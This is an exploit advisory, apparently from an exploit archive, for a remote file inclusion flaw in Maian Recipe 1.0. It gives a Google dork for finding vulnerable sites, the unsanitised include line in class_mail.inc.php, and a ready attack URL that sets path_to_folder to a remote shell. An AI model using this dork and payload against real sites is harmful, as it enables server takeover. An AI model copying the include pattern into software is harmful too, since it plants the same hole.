id: 1487
date: 02/07/2007
title: Maian Recipe 1.0 (path_to_folder) Remote File Include Vulnerability
author: Denven
cves: 

===================================================================
Maian Recipe 1.0 (path_to_folder) Remote File Include Vulnerability
===================================================================




*****************
Found by Denven *
*****************
*****************
Google Dork: "Powered by Maian Recipe v1.0"
*****************
ERROR:
classes/class_mail.inc.php :

include($path_to_folder.'classes/class.phpmailer.php');


****************************************************************************
**********
RFI:

http://www.SITE.com/path/classes/class_mail.inc.php?path_to_folder=[shell]

****************************************************************************



#  0day.today [2023-03-24]  #